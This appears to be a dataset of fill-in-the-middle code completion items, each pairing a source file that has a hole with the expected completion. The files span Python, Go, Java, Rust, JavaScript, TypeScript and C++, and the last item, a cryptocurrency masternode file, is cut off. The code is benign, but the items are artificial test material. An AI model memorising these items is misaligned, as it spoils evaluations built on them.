prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>api.py<|end_file_name|><|fim▁begin|>"""Translate cli commands to non-cli code."""
import logging
from urllib.error import HTTPError, URLError
import requests
from kytos.utils.config import KytosConfig
LOG = logging.getLogger(__name__)
class WebAPI: # pylint: disable=too-few-public-methods<|fim▁hole|> """Call the method to update the Web UI."""
kytos_api = KytosConfig().config.get('kytos', 'api')
url = f"{kytos_api}api/kytos/core/web/update"
version = args["<version>"]
if version:
url += f"/{version}"
try:
result = requests.post(url)
except(HTTPError, URLError, requests.exceptions.ConnectionError):
LOG.error("Can't connect to server: %s", kytos_api)
return
if result.status_code != 200:
LOG.info("Error while updating web ui: %s", result.content)
else:
LOG.info("Web UI updated.")<|fim▁end|> | """An API for the command-line interface."""
@classmethod
def update(cls, args): |
<|file_name|>wikipedia_test.go<|end_file_name|><|fim▁begin|>package wikipedia
import (
"log"
"testing"
"github.com/stretchr/testify/assert"
)
func TestQueryRU(t *testing.T) {
api := NewApi()
query := "лопата"
res, err := api.Query(RU, query)
if !assert.NoError(t, err) {
return
}
assert.Equal(t, query, res.Query)<|fim▁hole|> assert.NotEmpty(t, res.Items)
for _, it := range res.Items {
log.Printf("Item %s:\n%s (%s)\n\n", it.Text, it.Description, it.URL)
}
}
func TestQueryEN(t *testing.T) {
api := NewApi()
query := "shovel"
res, err := api.Query(EN, query)
if !assert.NoError(t, err) {
return
}
assert.Equal(t, query, res.Query)
assert.NotEmpty(t, res.Items)
for _, it := range res.Items {
log.Printf("Item %s:\n%s (%s)\n\n", it.Text, it.Description, it.URL)
}
}<|fim▁end|> | |
<|file_name|>run.py<|end_file_name|><|fim▁begin|>from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop<|fim▁hole|>http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start()<|fim▁end|> | from game import app
|
<|file_name|>layer.py<|end_file_name|><|fim▁begin|>"""This module provides REST services for Layers"""
import cherrypy
from LmCommon.common.lmconstants import HTTPStatus
from LmWebServer.common.lmconstants import HTTPMethod
from LmWebServer.services.api.v2.base import LmService
from LmWebServer.services.common.access_control import check_user_permission
from LmWebServer.services.cp_tools.lm_format import lm_formatter
# .............................................................................
@cherrypy.expose
@cherrypy.popargs('path_layer_id')
class LayerService(LmService):
"""Class for layers service.
"""
# ................................
@lm_formatter
def GET(self, path_layer_id=None, after_time=None, alt_pred_code=None,
before_time=None, date_code=None, epsg_code=None, env_code=None,
env_type_id=None, gcm_code=None, layerType=None, limit=100,
offset=0, url_user=None, scenario_id=None, squid=None, **params):
"""GET request. Individual layer, count, or list.
"""
# Layer type:
# 0 - Anything
# 1 - Environmental layer
# 2 - ? (Not implemented yet)
if layerType is None or layerType == 0:
if path_layer_id is None:
return self._list_layers(
self.get_user_id(url_user=url_user), after_time=after_time,
before_time=before_time, epsg_code=epsg_code, limit=limit,
offset=offset, squid=squid)
if path_layer_id.lower() == 'count':
return self._count_layers(
self.get_user_id(url_user=url_user), after_time=after_time,
before_time=before_time, epsg_code=epsg_code, squid=squid)
return self._get_layer(path_layer_id, env_layer=False)
if path_layer_id is None:
return self._list_env_layers(
self.get_user_id(url_user=url_user), after_time=after_time,
alt_pred_code=alt_pred_code, before_time=before_time,
date_code=date_code, env_code=env_code,
env_type_id=env_type_id, epsg_code=epsg_code,
gcm_code=gcm_code, limit=limit, offset=offset,
scenario_id=scenario_id)
if path_layer_id.lower() == 'count':
return self._count_env_layers(
self.get_user_id(url_user=url_user), after_time=after_time,
alt_pred_code=alt_pred_code, before_time=before_time,
date_code=date_code, env_code=env_code,
env_type_id=env_type_id, epsg_code=epsg_code,
gcm_code=gcm_code, scenario_code=scenario_id)
return self._get_layer(path_layer_id, env_layer=True)
<|fim▁hole|> scenario_code=None):
"""Count environmental layer objects matching the specified criteria
Args:
user_id: The user to list environmental layers for. Note that this
may not be the same user logged into the system
after_time: Return layers modified after this time (Modified Julian
Day)
alt_pred_code: Return layers with this alternate prediction code
before_time: Return layers modified before this time (Modified
Julian Day)
date_code: Return layers with this date code
env_code: Return layers with this environment code
env_type_id: Return layers with this environmental type
epsg_code: Return layers with this EPSG code
gcm_code: Return layers with this GCM code
scenario_id: Return layers from this scenario
"""
layer_count = self.scribe.count_env_layers(
user_id=user_id, env_code=env_code, gcm_code=gcm_code,
alt_pred_code=alt_pred_code, date_code=date_code,
after_time=after_time, before_time=before_time, epsg=epsg_code,
env_type_id=env_type_id, scenario_code=scenario_code)
return {'count': layer_count}
# ................................
def _count_layers(self, user_id, after_time=None, before_time=None,
epsg_code=None, squid=None):
"""Return a count of layers matching the specified criteria
Args:
user_id: The user to list layers for. Note that this may not be
the same user that is logged into the system
after_time: List layers modified after this time (Modified Julian
Day)
before_time: List layers modified before this time (Modified Julian
Day)
epsg_code: Return layers that have this EPSG code
limit: Return this number of layers, at most
offset: Offset the returned layers by this number
squid: Return layers with this species identifier
"""
layer_count = self.scribe.count_layers(
user_id=user_id, squid=squid, after_time=after_time,
before_time=before_time, epsg=epsg_code)
return {'count': layer_count}
# ................................
def _get_layer(self, path_layer_id, env_layer=False):
"""Attempt to get a layer
"""
try:
_ = int(path_layer_id)
except ValueError:
raise cherrypy.HTTPError(
HTTPStatus.BAD_REQUEST,
'{} is not a valid layer ID'.format(path_layer_id))
if env_layer:
lyr = self.scribe.get_env_layer(lyr_id=path_layer_id)
else:
lyr = self.scribe.get_layer(lyr_id=path_layer_id)
if lyr is None:
raise cherrypy.HTTPError(
HTTPStatus.NOT_FOUND,
'Environmental layer {} was not found'.format(path_layer_id))
if check_user_permission(self.get_user_id(), lyr, HTTPMethod.GET):
return lyr
raise cherrypy.HTTPError(
HTTPStatus.FORBIDDEN,
'User {} does not have permission to access layer {}'.format(
self.get_user_id(), path_layer_id))
# ................................
def _list_env_layers(self, user_id, after_time=None, alt_pred_code=None,
before_time=None, date_code=None, env_code=None,
env_type_id=None, epsg_code=None, gcm_code=None,
limit=100, offset=0, scenario_id=None):
"""List environmental layer objects matching the specified criteria
Args:
user_id: The user to list environmental layers for. Note that this
may not be the same user logged into the system
after_time: (optional) Return layers modified after this time
(Modified Julian Day)
alt_pred_code: (optional) Return layers with this alternate
prediction code
before_time: (optional) Return layers modified before this time
(Modified Julian Day)
date_code: (optional) Return layers with this date code
env_code: (optional) Return layers with this environment code
env_type_id: (optional) Return layers with this environmental type
epsg_code: (optional) Return layers with this EPSG code
gcm_code: (optional) Return layers with this GCM code
limit: (optional) Return this number of layers, at most
offset: (optional) Offset the returned layers by this number
scenario_id: (optional) Return layers from this scenario
"""
lyr_atoms = self.scribe.list_env_layers(
offset, limit, user_id=user_id, env_code=env_code,
gcm_code=gcm_code, alt_pred_code=alt_pred_code,
date_code=date_code, after_time=after_time,
before_time=before_time, epsg=epsg_code, env_type_id=env_type_id)
return lyr_atoms
# ................................
def _list_layers(self, user_id, after_time=None, before_time=None,
epsg_code=None, limit=100, offset=0, squid=None):
"""Return a list of layers matching the specified criteria
Args:
user_id: The user to list layers for. Note that this may not be
the same user that is logged into the system
after_time: List layers modified after this time (Modified Julian
Day)
before_time: List layers modified before this time (Modified Julian
Day)
epsg_code: Return layers that have this EPSG code
limit: Return this number of layers, at most
offset: Offset the returned layers by this number
squid: Return layers with this species identifier
"""
layer_atoms = self.scribe.list_layers(
offset, limit, user_id=user_id, squid=squid, after_time=after_time,
before_time=before_time, epsg=epsg_code)
return layer_atoms<|fim▁end|> | # ................................
def _count_env_layers(self, user_id, after_time=None, alt_pred_code=None,
before_time=None, date_code=None, env_code=None,
env_type_id=None, epsg_code=None, gcm_code=None, |
<|file_name|>overlay.js<|end_file_name|><|fim▁begin|>if(!org) var org={};
if(!org.judison) org.judison={};
if(!org.judison.bmsp) org.judison.bmsp={};
with(org.judison.bmsp){
init = function(){
document.getElementById("bookmarks-view").place = "place:queryType=1&folder=" + window.top.PlacesUtils.bookmarksMenuFolderId;
}
<|fim▁hole|><|fim▁end|> | } |
<|file_name|>MyJobTi.java<|end_file_name|><|fim▁begin|>package com.vsked.timer;
import java.util.Date;
import java.util.TimerTask;
public class MyJobTi extends TimerTask {
<|fim▁hole|> private String jobName="defaultJob";
private int jobCount=0;
public int getJobCount() {
return jobCount;
}
public MyJobTi(String jobName) {
super();
this.jobName = jobName;
jobCount=0;
}
@Override
public void run() {
jobCount++;
System.out.println(new Date()+ "this is my job:"+jobName+"|current count is:"+jobCount);
}
}<|fim▁end|> | |
<|file_name|>Bonus.hpp<|end_file_name|><|fim▁begin|>/*
* Fiahil
* 12.05.2012
*/
#if !defined(__Bomberman_Bonus_h)
#define __Bomberman_Bonus_h
#include <Model.hpp>
#include "enum.hpp"
#include "AObj.hpp"
class Bonus : public AObj
{
public:
Bonus(BonusType::eBonus t, Point const&, gdl::Model&);<|fim▁hole|> BonusType::eBonus _type;
gdl::Model& _model;
public:
BonusType::eBonus getType(void) const;
void initialize(void);
void draw();
void update(gdl::GameClock const&, gdl::Input&);
};
#endif<|fim▁end|> | virtual ~Bonus();
private: |
<|file_name|>extractData.py<|end_file_name|><|fim▁begin|>import numpy as np<|fim▁hole|>import scipy.io as io
dataStructure = io.loadmat('starfish.mat')
receiverPoints = dataStructure['receivers']
sourcePoints = dataStructure['receivers']
scattererPoints = dataStructure['scatterer']
scatteredData = dataStructure['scatteredData']
recordingTimes = dataStructure['recordTimes']
recordingTimes = np.reshape(recordingTimes, (recordingTimes.shape[1],))
np.save('receiverPoints.npy', receiverPoints)
np.save('sourcePoints.npy', sourcePoints)
np.save('scattererPoints.npy', scattererPoints)
np.save('scatteredData.npy', scatteredData)
np.save('recordingTimes.npy', recordingTimes)<|fim▁end|> | |
<|file_name|>Constants.java<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 2016. Xiaomu Tech.(Beijing) LLC. All rights reserved.
*/
package de.mpg.mpdl.labcam.code.common.widget;
/**
* Created by yingli on 10/19/15.
*/
public class Constants {
public static final String STATUS_SUCCESS = "SUCCESS";
public static final String KEY_CLASS_NAME = "key_class_name";
/************************** SHARED_PREFERENCES **********************************/
public static final String SHARED_PREFERENCES = "myPref"; // name of shared preferences
public static final String API_KEY = "apiKey";
public static final String USER_ID = "userId";
public static final String USER_NAME = "username";
public static final String FAMILY_NAME = "familyName";
public static final String GIVEN_NAME = "givenName";
public static final String PASSWORD = "password";
<|fim▁hole|> public static final String COLLECTION_ID = "collectionID";
public static final String OCR_IS_ON = "ocrIsOn";
public static final String IS_ALBUM = "isAlbum";
}<|fim▁end|> | public static final String EMAIL = "email";
public static final String SERVER_NAME = "serverName";
public static final String OTHER_SERVER = "otherServer"; |
<|file_name|>TicketGrid.js<|end_file_name|><|fim▁begin|>/**
* @class NetProfile.tickets.controller.TicketGrid
* @extends Ext.app.Controller
*/
Ext.define('NetProfile.tickets.controller.TicketGrid', {
extend: 'Ext.app.Controller',
requires: [
'Ext.menu.Menu'
],
fromTemplateText: 'From Template',
fromTemplateTipText: 'Add ticket from template',
scheduleText: 'Schedule',
init: function()
{
this.control({
'grid_tickets_Ticket' : {
beforerender: function(grid)
{
var tb;
tb = grid.getDockedItems('toolbar[dock=top]');
if(!tb || !tb.length)
return;
tb = tb[0];
tb.add({
text: this.fromTemplateText,
tooltip: { text: this.fromTemplateTipText, title: this.fromTemplateText },
iconCls: 'ico-add',
handler: function()
{
grid.spawnWizard('tpl');
}
});
}<|fim▁hole|> scope: this, fn: function(btn, ev)
{
var wiz = btn.up('npwizard'),
date_field = wiz.down('datetimefield[name=assigned_time]'),
cfg = { dateField: date_field },
win, sched, values;
values = wiz.getValues();
if(values['assigned_uid'])
cfg.userId = parseInt(values['assigned_uid']);
if(values['assigned_gid'])
cfg.groupId = parseInt(values['assigned_gid']);
if(values['ticketid'])
cfg.ticketId = parseInt(values['ticketid']);
if(values['tstid'])
cfg.ticketStateId = parseInt(values['tstid']);
if(values['tschedid'])
cfg.schedulerId = parseInt(values['tschedid']);
if(values['ttplid'])
cfg.templateId = parseInt(values['ttplid']);
win = Ext.create('Ext.ux.window.CenterWindow', {
title: this.scheduleText,
modal: true
});
sched = Ext.create('NetProfile.tickets.view.Scheduler', cfg);
win.add(sched);
win.show();
return true;
}}
}
});
}
});<|fim▁end|> | },
'npwizard button#btn_sched' : {
click: { |
<|file_name|>NextRTCEventBus.java<|end_file_name|><|fim▁begin|>package org.nextrtc.signalingserver.api;
import lombok.extern.log4j.Log4j;
import org.springframework.context.annotation.Scope;
import org.springframework.stereotype.Service;
import com.google.common.eventbus.EventBus;
@Log4j
@Service("nextRTCEventBus")
@Scope("singleton")
public class NextRTCEventBus {
private EventBus eventBus;
public NextRTCEventBus() {
this.eventBus = new EventBus();
}<|fim▁hole|> public void post(NextRTCEvent event) {
log.info("POSTED EVENT: " + event);
eventBus.post(event);
}
@Deprecated
public void post(Object o) {
eventBus.post(o);
}
public void register(Object listeners) {
log.info("REGISTERED LISTENER: " + listeners);
eventBus.register(listeners);
}
}<|fim▁end|> | |
<|file_name|>fibonacci_nth.rs<|end_file_name|><|fim▁begin|>fn main() {
println!("{}",fibo(10));
println!("{}",fibo(8));
println!("{}",fibo(5));
println!("{}",fibo(2));
}
// Rerturns the nth element of the fibonacci sequence
fn fibo(n :i64) -> i64 {
match n {
0 => 0,
1 => 1,<|fim▁hole|> }
}<|fim▁end|> | _ => (fibo(n-1) + fibo(n-2)) |
<|file_name|>arguments.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python<|fim▁hole|>print(CurrentScript().arguments)<|fim▁end|> | |
<|file_name|>windows2003ServerMemory.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals
from memory.mem import _Memory
class Windows2003ServerMemory(_Memory):
def __init__(self, params):
super(Windows2003ServerMemory, self).__init__(params)
def csv_all_modules_dll(self):
super(Windows2003ServerMemory, self)._csv_all_modules_dll()
def csv_all_modules_opened_files(self):<|fim▁hole|><|fim▁end|> | super(Windows2003ServerMemory, self)._csv_all_modules_opened_files() |
<|file_name|>add-edit-course.module.ts<|end_file_name|><|fim▁begin|>import { NgModule, } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { CommonModule } from '@angular/common';
import { routes } from './add-edit-course.routes';
import { NewCourseComponent } from './add-edit-course.component';
import { durationComponent } from '../../core/components/duration/duration.component';
import { authorsComponent } from '../../core/components/authors/authors.component';
import { dateComponent } from '../../core/components/date/date.component';
import { durationModule } from '../../core/pipes/duration.module';
import { authorsService } from '../../core/services';
import { NumberValidator } from '../../core/diractives/number.validator.deractives';
import { DateValidator } from '../../core/diractives/date.validator.diractives';
@NgModule({
declarations: [
NewCourseComponent,
durationComponent,
NumberValidator,
DateValidator,
authorsComponent,
dateComponent
],
imports: [
routes,
CommonModule,
durationModule,<|fim▁hole|>})
export class NewCourseModule {
constructor() {
}
}<|fim▁end|> | FormsModule
],
providers: [authorsService] |
<|file_name|>masternode.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2014-2017 The Innova Core developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "activemasternode.h"
#include "consensus/validation.h"
#include "darksend.h"
#include "init.h"
#include "governance.h"
#include "masternode.h"
#include "masternode-payments.h"
#include "masternode-sync.h"
#include "masternodeman.h"
#include "util.h"
#include <boost/lexical_cast.hpp>
CMasternode::CMasternode() :
vin(),
addr(),
pubKeyCollateralAddress(),
pubKeyMasternode(),
lastPing(),
vchSig(),
sigTime(GetAdjustedTime()),
nLastDsq(0),
nTimeLastChecked(0),
nTimeLastPaid(0),
nTimeLastWatchdogVote(0),
nActiveState(MASTERNODE_ENABLED),
nCacheCollateralBlock(0),
nBlockLastPaid(0),
nProtocolVersion(PROTOCOL_VERSION),
nPoSeBanScore(0),
nPoSeBanHeight(0),
fAllowMixingTx(true),
fUnitTest(false)
{}
CMasternode::CMasternode(CService addrNew, CTxIn vinNew, CPubKey pubKeyCollateralAddressNew, CPubKey pubKeyMasternodeNew, int nProtocolVersionIn) :
vin(vinNew),
addr(addrNew),
pubKeyCollateralAddress(pubKeyCollateralAddressNew),
pubKeyMasternode(pubKeyMasternodeNew),
lastPing(),
vchSig(),
sigTime(GetAdjustedTime()),
nLastDsq(0),
nTimeLastChecked(0),
nTimeLastPaid(0),
nTimeLastWatchdogVote(0),
nActiveState(MASTERNODE_ENABLED),
nCacheCollateralBlock(0),
nBlockLastPaid(0),
nProtocolVersion(nProtocolVersionIn),
nPoSeBanScore(0),
nPoSeBanHeight(0),
fAllowMixingTx(true),
fUnitTest(false)
{}
CMasternode::CMasternode(const CMasternode& other) :
vin(other.vin),
addr(other.addr),
pubKeyCollateralAddress(other.pubKeyCollateralAddress),
pubKeyMasternode(other.pubKeyMasternode),
lastPing(other.lastPing),
vchSig(other.vchSig),
sigTime(other.sigTime),
nLastDsq(other.nLastDsq),
nTimeLastChecked(other.nTimeLastChecked),
nTimeLastPaid(other.nTimeLastPaid),
nTimeLastWatchdogVote(other.nTimeLastWatchdogVote),
nActiveState(other.nActiveState),
nCacheCollateralBlock(other.nCacheCollateralBlock),
nBlockLastPaid(other.nBlockLastPaid),
nProtocolVersion(other.nProtocolVersion),
nPoSeBanScore(other.nPoSeBanScore),
nPoSeBanHeight(other.nPoSeBanHeight),
fAllowMixingTx(other.fAllowMixingTx),
fUnitTest(other.fUnitTest)
{}
CMasternode::CMasternode(const CMasternodeBroadcast& mnb) :
vin(mnb.vin),
addr(mnb.addr),
pubKeyCollateralAddress(mnb.pubKeyCollateralAddress),
pubKeyMasternode(mnb.pubKeyMasternode),
lastPing(mnb.lastPing),
vchSig(mnb.vchSig),
sigTime(mnb.sigTime),
nLastDsq(0),
nTimeLastChecked(0),
nTimeLastPaid(0),
nTimeLastWatchdogVote(mnb.sigTime),
nActiveState(mnb.nActiveState),
nCacheCollateralBlock(0),
nBlockLastPaid(0),
nProtocolVersion(mnb.nProtocolVersion),
nPoSeBanScore(0),
nPoSeBanHeight(0),
fAllowMixingTx(true),
fUnitTest(false)
{}
//
// When a new masternode broadcast is sent, update our information
//
bool CMasternode::UpdateFromNewBroadcast(CMasternodeBroadcast& mnb)
{
if(mnb.sigTime <= sigTime && !mnb.fRecovery) return false;
pubKeyMasternode = mnb.pubKeyMasternode;
sigTime = mnb.sigTime;
vchSig = mnb.vchSig;
nProtocolVersion = mnb.nProtocolVersion;
addr = mnb.addr;
nPoSeBanScore = 0;
nPoSeBanHeight = 0;
nTimeLastChecked = 0;
int nDos = 0;
if(mnb.lastPing == CMasternodePing() || (mnb.lastPing != CMasternodePing() && mnb.lastPing.CheckAndUpdate(this, true, nDos))) {
lastPing = mnb.lastPing;
mnodeman.mapSeenMasternodePing.insert(std::make_pair(lastPing.GetHash(), lastPing));
}
// if it matches our Masternode privkey...
if(fMasterNode && pubKeyMasternode == activeMasternode.pubKeyMasternode) {
nPoSeBanScore = -MASTERNODE_POSE_BAN_MAX_SCORE;
if(nProtocolVersion == PROTOCOL_VERSION) {
// ... and PROTOCOL_VERSION, then we've been remotely activated ...
activeMasternode.ManageState();
} else {
// ... otherwise we need to reactivate our node, do not add it to the list and do not relay
// but also do not ban the node we get this message from
LogPrintf("CMasternode::UpdateFromNewBroadcast -- wrong PROTOCOL_VERSION, re-activate your MN: message nProtocolVersion=%d PROTOCOL_VERSION=%d\n", nProtocolVersion, PROTOCOL_VERSION);
return false;
}
}
return true;
}
//
// Deterministically calculate a given "score" for a Masternode depending on how close it's hash is to
// the proof of work for that block. The further away they are the better, the furthest will win the election
// and get paid this block
//
arith_uint256 CMasternode::CalculateScore(const uint256& blockHash)
{
uint256 aux = ArithToUint256(UintToArith256(vin.prevout.hash) + vin.prevout.n);
CHashWriter ss(SER_GETHASH, PROTOCOL_VERSION);
ss << blockHash;
arith_uint256 hash2 = UintToArith256(ss.GetHash());
CHashWriter ss2(SER_GETHASH, PROTOCOL_VERSION);
ss2 << blockHash;
ss2 << aux;
arith_uint256 hash3 = UintToArith256(ss2.GetHash());
return (hash3 > hash2 ? hash3 - hash2 : hash2 - hash3);
}
void CMasternode::Check(bool fForce)
{
LOCK(cs);
if(ShutdownRequested()) return;
if(!fForce && (GetTime() - nTimeLastChecked < MASTERNODE_CHECK_SECONDS)) return;
nTimeLastChecked = GetTime();
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state\n", vin.prevout.ToStringShort(), GetStateString());
//once spent, stop doing the checks
if(IsOutpointSpent()) return;
int nHeight = 0;
if(!fUnitTest) {
TRY_LOCK(cs_main, lockMain);<|fim▁hole|> if(!lockMain) return;
CCoins coins;
if(!pcoinsTip->GetCoins(vin.prevout.hash, coins) ||
(unsigned int)vin.prevout.n>=coins.vout.size() ||
coins.vout[vin.prevout.n].IsNull()) {
nActiveState = MASTERNODE_OUTPOINT_SPENT;
LogPrint("masternode", "CMasternode::Check -- Failed to find Masternode UTXO, masternode=%s\n", vin.prevout.ToStringShort());
return;
}
nHeight = chainActive.Height();
}
if(IsPoSeBanned()) {
if(nHeight < nPoSeBanHeight) return; // too early?
// Otherwise give it a chance to proceed further to do all the usual checks and to change its state.
// Masternode still will be on the edge and can be banned back easily if it keeps ignoring mnverify
// or connect attempts. Will require few mnverify messages to strengthen its position in mn list.
LogPrintf("CMasternode::Check -- Masternode %s is unbanned and back in list now\n", vin.prevout.ToStringShort());
DecreasePoSeBanScore();
} else if(nPoSeBanScore >= MASTERNODE_POSE_BAN_MAX_SCORE) {
nActiveState = MASTERNODE_POSE_BAN;
// ban for the whole payment cycle
nPoSeBanHeight = nHeight + mnodeman.size();
LogPrintf("CMasternode::Check -- Masternode %s is banned till block %d now\n", vin.prevout.ToStringShort(), nPoSeBanHeight);
return;
}
int nActiveStatePrev = nActiveState;
bool fOurMasternode = fMasterNode && activeMasternode.pubKeyMasternode == pubKeyMasternode;
// masternode doesn't meet payment protocol requirements ...
bool fRequireUpdate = nProtocolVersion < mnpayments.GetMinMasternodePaymentsProto() ||
// or it's our own node and we just updated it to the new protocol but we are still waiting for activation ...
(fOurMasternode && nProtocolVersion < PROTOCOL_VERSION);
if(fRequireUpdate) {
nActiveState = MASTERNODE_UPDATE_REQUIRED;
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
return;
}
// keep old masternodes on start, give them a chance to receive updates...
bool fWaitForPing = !masternodeSync.IsMasternodeListSynced() && !IsPingedWithin(MASTERNODE_MIN_MNP_SECONDS);
if(fWaitForPing && !fOurMasternode) {
// ...but if it was already expired before the initial check - return right away
if(IsExpired() || IsWatchdogExpired() || IsNewStartRequired()) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state, waiting for ping\n", vin.prevout.ToStringShort(), GetStateString());
return;
}
}
// don't expire if we are still in "waiting for ping" mode unless it's our own masternode
if(!fWaitForPing || fOurMasternode) {
if(!IsPingedWithin(MASTERNODE_NEW_START_REQUIRED_SECONDS)) {
nActiveState = MASTERNODE_NEW_START_REQUIRED;
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
return;
}
bool fWatchdogActive = masternodeSync.IsSynced() && mnodeman.IsWatchdogActive();
bool fWatchdogExpired = (fWatchdogActive && ((GetTime() - nTimeLastWatchdogVote) > MASTERNODE_WATCHDOG_MAX_SECONDS));
LogPrint("masternode", "CMasternode::Check -- outpoint=%s, nTimeLastWatchdogVote=%d, GetTime()=%d, fWatchdogExpired=%d\n",
vin.prevout.ToStringShort(), nTimeLastWatchdogVote, GetTime(), fWatchdogExpired);
if(fWatchdogExpired) {
nActiveState = MASTERNODE_WATCHDOG_EXPIRED;
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
return;
}
if(!IsPingedWithin(MASTERNODE_EXPIRATION_SECONDS)) {
nActiveState = MASTERNODE_EXPIRED;
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
return;
}
}
if(lastPing.sigTime - sigTime < MASTERNODE_MIN_MNP_SECONDS) {
nActiveState = MASTERNODE_PRE_ENABLED;
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
return;
}
nActiveState = MASTERNODE_ENABLED; // OK
if(nActiveStatePrev != nActiveState) {
LogPrint("masternode", "CMasternode::Check -- Masternode %s is in %s state now\n", vin.prevout.ToStringShort(), GetStateString());
}
}
bool CMasternode::IsValidNetAddr()
{
return IsValidNetAddr(addr);
}
bool CMasternode::IsValidNetAddr(CService addrIn)
{
// TODO: regtest is fine with any addresses for now,
// should probably be a bit smarter if one day we start to implement tests for this
return Params().NetworkIDString() == CBaseChainParams::REGTEST ||
(addrIn.IsIPv4() && IsReachable(addrIn) && addrIn.IsRoutable());
}
masternode_info_t CMasternode::GetInfo()
{
masternode_info_t info;
info.vin = vin;
info.addr = addr;
info.pubKeyCollateralAddress = pubKeyCollateralAddress;
info.pubKeyMasternode = pubKeyMasternode;
info.sigTime = sigTime;
info.nLastDsq = nLastDsq;
info.nTimeLastChecked = nTimeLastChecked;
info.nTimeLastPaid = nTimeLastPaid;
info.nTimeLastWatchdogVote = nTimeLastWatchdogVote;
info.nTimeLastPing = lastPing.sigTime;
info.nActiveState = nActiveState;
info.nProtocolVersion = nProtocolVersion;
info.fInfoValid = true;
return info;
}
std::string CMasternode::StateToString(int nStateIn)
{
switch(nStateIn) {
case MASTERNODE_PRE_ENABLED: return "PRE_ENABLED";
case MASTERNODE_ENABLED: return "ENABLED";
case MASTERNODE_EXPIRED: return "EXPIRED";
case MASTERNODE_OUTPOINT_SPENT: return "OUTPOINT_SPENT";
case MASTERNODE_UPDATE_REQUIRED: return "UPDATE_REQUIRED";
case MASTERNODE_WATCHDOG_EXPIRED: return "WATCHDOG_EXPIRED";
case MASTERNODE_NEW_START_REQUIRED: return "NEW_START_REQUIRED";
case MASTERNODE_POSE_BAN: return "POSE_BAN";
default: return "UNKNOWN";
}
}
std::string CMasternode::GetStateString() const
{
return StateToString(nActiveState);
}
std::string CMasternode::GetStatus() const
{
// TODO: return smth a bit more human readable here
return GetStateString();
}
int CMasternode::GetCollateralAge()
{
int nHeight;
{
TRY_LOCK(cs_main, lockMain);
if(!lockMain || !chainActive.Tip()) return -1;
nHeight = chainActive.Height();
}
if (nCacheCollateralBlock == 0) {
int nInputAge = GetInputAge(vin);
if(nInputAge > 0) {
nCacheCollateralBlock = nHeight - nInputAge;
} else {
return nInputAge;
}
}
return nHeight - nCacheCollateralBlock;
}
void CMasternode::UpdateLastPaid(const CBlockIndex *pindex, int nMaxBlocksToScanBack)
{
if(!pindex) return;
const CBlockIndex *BlockReading = pindex;
CScript mnpayee = GetScriptForDestination(pubKeyCollateralAddress.GetID());
// LogPrint("masternode", "CMasternode::UpdateLastPaidBlock -- searching for block with payment to %s\n", vin.prevout.ToStringShort());
LOCK(cs_mapMasternodeBlocks);
for (int i = 0; BlockReading && BlockReading->nHeight > nBlockLastPaid && i < nMaxBlocksToScanBack; i++) {
if(mnpayments.mapMasternodeBlocks.count(BlockReading->nHeight) &&
mnpayments.mapMasternodeBlocks[BlockReading->nHeight].HasPayeeWithVotes(mnpayee, 2))
{
CBlock block;
if(!ReadBlockFromDisk(block, BlockReading, Params().GetConsensus())) // shouldn't really happen
continue;
CAmount nMasternodePayment = GetMasternodePayment(BlockReading->nHeight, block.vtx[0].GetValueOut());
BOOST_FOREACH(CTxOut txout, block.vtx[0].vout)
if(mnpayee == txout.scriptPubKey && nMasternodePayment == txout.nValue) {
nBlockLastPaid = BlockReading->nHeight;
nTimeLastPaid = BlockReading->nTime;
LogPrint("masternode", "CMasternode::UpdateLastPaidBlock -- searching for block with payment to %s -- found new %d\n", vin.prevout.ToStringShort(), nBlockLastPaid);
return;
}
}
if (BlockReading->pprev == NULL) { assert(BlockReading); break; }
BlockReading = BlockReading->pprev;
}
// Last payment for this masternode wasn't found in latest mnpayments blocks
// or it was found in mnpayments blocks but wasn't found in the blockchain.
// LogPrint("masternode", "CMasternode::UpdateLastPaidBlock -- searching for block with payment to %s -- keeping old %d\n", vin.prevout.ToStringShort(), nBlockLastPaid);
}
bool CMasternodeBroadcast::Create(std::string strService, std::string strKeyMasternode, std::string strTxHash, std::string strOutputIndex, std::string& strErrorRet, CMasternodeBroadcast &mnbRet, bool fOffline)
{
CTxIn txin;
CPubKey pubKeyCollateralAddressNew;
CKey keyCollateralAddressNew;
CPubKey pubKeyMasternodeNew;
CKey keyMasternodeNew;
//need correct blocks to send ping
if(!fOffline && !masternodeSync.IsBlockchainSynced()) {
strErrorRet = "Sync in progress. Must wait until sync is complete to start Masternode";
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
return false;
}
if(!darkSendSigner.GetKeysFromSecret(strKeyMasternode, keyMasternodeNew, pubKeyMasternodeNew)) {
strErrorRet = strprintf("Invalid masternode key %s", strKeyMasternode);
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
return false;
}
if(!pwalletMain->GetMasternodeVinAndKeys(txin, pubKeyCollateralAddressNew, keyCollateralAddressNew, strTxHash, strOutputIndex)) {
strErrorRet = strprintf("Could not allocate txin %s:%s for masternode %s", strTxHash, strOutputIndex, strService);
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
return false;
}
CService service = CService(strService);
